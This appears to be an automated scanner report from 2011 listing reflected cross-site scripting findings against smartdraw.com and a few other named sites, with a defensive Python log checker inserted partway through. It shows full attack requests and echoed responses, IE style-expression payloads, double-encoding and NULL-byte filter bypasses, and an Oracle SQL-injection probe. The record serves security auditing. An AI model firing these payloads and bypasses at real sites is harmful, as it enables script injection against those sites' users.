GET /videos81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vgiqbgv2pky1le45ukty4wfj; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17 was submitted in the REST URL parameter 1. This input was echoed as 3f3f7"style="x:expression(alert(1))"704a7a40d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17/demo/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wupmsxznbmovt155mvmvxh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a was submitted in the REST URL parameter 2. This input was echoed as 2addd"style="x:expression(alert(1))"108d415c1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ra0kk255lzz14izejoevse45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8 was submitted in the REST URL parameter 2. This input was echoed as 5ca5b"style="x:expression(alert(1))"1a726fc0e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ygebeo553nhi5mztwrtyso45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 was submitted in the REST URL parameter 3. This input was echoed as 551b7"style="x:expression(alert(1))"8d874867177 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/x22551b7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228d874867177 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gtu5y445d4j1giqdn4l3bg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d was submitted in the REST URL parameter 3. This input was echoed as bd314"style="x:expression(alert(1))"9639797b41d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w11nlueclbe1ry55ysywmpry; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
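As an added example covering the double-encoded probes in the REST URL parameter findings above and the raw parameter-name probes (not part of the original report), the following is a log-side check a defender can run: it URL-decodes each requested URL repeatedly and flags requests in which attribute-breakout characters appear only after a second decode (the %253c / %2522 bypass the report describes), or in which an XSS token survives canonicalisation. The sample log lines, the W3C field layout and the assumption that the log records the URL as the client sent it are all constructed for this example.

```python
# Added example (not from the original report): a log-side check for the probes
# the findings above describe. It URL-decodes each requested URL repeatedly and
# flags requests where attribute-breakout characters appear only after a second
# decode (the %253c / %2522 bypass), or where an XSS token survives canonicalisation.
# The sample log lines, the W3C field layout and the assumption that the log keeps
# the URL as sent are all constructed for this example; adapt the parser to your logs.
import re
from typing import Optional
from urllib.parse import unquote

DANGEROUS = ('<', '>', '"', "'")
XSS_TOKENS = re.compile(r'expression\s*\(|<script|javascript:|\bon[a-z]+\s*=', re.I)

LOG_FIELDS = ['date', 'time', 's-ip', 'cs-method', 'cs-uri-stem', 'cs-uri-query',
              's-port', 'cs-username', 'c-ip', 'cs(User-Agent)', 'sc-status']

# Constructed IIS-style W3C log excerpt: a benign request, the double-encoded probe,
# the raw parameter-name probe, and a benign double-encoded percent sign.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2011-02-03 20:29:40 10.0.0.5 GET /training/index.htm - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 200
2011-02-03 20:29:59 10.0.0.5 GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 404
2011-02-03 20:29:50 10.0.0.5 GET /training/x22 ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 404
2011-02-03 20:30:01 10.0.0.5 GET /search.aspx q=100%2525+off 80 - 192.0.2.11 Mozilla/5.0 200
"""


def decode_layers(value: str, max_depth: int = 5) -> list:
    """Successive URL-decodes of value until it stops changing (bounded)."""
    layers = [value]
    for _ in range(max_depth):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def classify(url: str) -> Optional[str]:
    """Return a reason string if the URL looks like an XSS probe, else None."""
    layers = decode_layers(url)
    once = layers[1] if len(layers) > 1 else layers[0]   # what the web server's single decode yields
    final = layers[-1]                                    # what a double-decoding application sees
    hidden = [c for c in DANGEROUS if c in final and c not in once]
    if len(layers) > 2 and hidden:
        return 'double-encoded breakout chars ' + ''.join(hidden)
    if XSS_TOKENS.search(final):
        return 'xss token after canonicalisation'
    return None


def parse_w3c(log_text: str):
    """Yield one dict per data line; comment lines and malformed lines are skipped."""
    for line in log_text.splitlines():
        if not line or line.startswith('#'):
            continue
        parts = line.split(' ')
        if len(parts) != len(LOG_FIELDS):
            continue   # a production pipeline should count these rather than drop them silently
        yield dict(zip(LOG_FIELDS, parts))


def find_xss_probes(log_text: str) -> list:
    """Return (client ip, uri stem, reason) for each flagged request, in log order."""
    hits = []
    for rec in parse_w3c(log_text):
        url = rec['cs-uri-stem']
        if rec['cs-uri-query'] != '-':
            url += '?' + rec['cs-uri-query']
        reason = classify(url)
        if reason:
            hits.append((rec['c-ip'], rec['cs-uri-stem'], reason))
    return hits


if __name__ == '__main__':
    for ip, stem, reason in find_xss_probes(SAMPLE_LOG):
        print(ip, stem, reason)
```

The two-stage rule matters for precision: a value that merely decodes twice (the `100%2525` search term) is not flagged, because no breakout character is revealed by the second pass; only requests where `<`, `>`, `"` or `'` first appear after the second decode, or where an XSS token is present once decoding is exhausted, are reported. Because IIS itself decodes the path once before the application runs, the "once" layer is what a server-side blocklist of the kind the report describes would have inspected.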
3.216. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 436c4"style="x:expression(alert(1))"7d96edb3e1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sxjxsy55v4wrlmeet1lslx45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.217. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e581f"style="x:expression(alert(1))"3b6d10c18aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qlfc4j452c3dom55lvonz145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8809
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a was submitted in the REST URL parameter 1. This input was echoed as 9bd6e"style="x:expression(alert(1))"b4a37af963a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4s50qr0kvr4fhux3xpku555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8683
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e was submitted in the REST URL parameter 1. This input was echoed as 2d4c3"style="x:expression(alert(1))"a464241924e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x222d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xxiaal45scvt05rw0scrir55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8704
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.220. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ce3"style="x:expression(alert(1))"57e4b8b7737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4rkbbezripwlcr04310bhix; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8725
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.221. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db50c"style%3d"x%3aexpression(alert(1))"751e53b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db50c"style="x:expression(alert(1))"751e53b85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?db50c"style%3d"x%3aexpression(alert(1))"751e53b85e=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:39 GMT
Content-Length: 8718
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=f0nhyr451wf2n5ul5fkcv5fi; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae was submitted in the url parameter. This input was echoed as 4c0ad"style="x:expression(alert(1))"f42279855ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j84c0ad"style%3d"x%3aexpression(alert(1))"f42279855ae&title=Magadheera+SmartDesis.TK.mp4 HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the '"--></style></script><script>alert(0x000043)</script> request parameter is copied into the HTML document as plain text between tags. The payload 8e1ef<script>alert(1)</script>559c076520b was submitted in the '"--></style></script><script>alert(0x000043)</script> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _flowExecutionKey request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00354d0"%3bbf98880f27f was submitted in the _flowExecutionKey parameter. This input was echoed as 354d0";bf98880f27f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27%00354d0"%3bbf98880f27f HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761712|check#true#1296759912; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
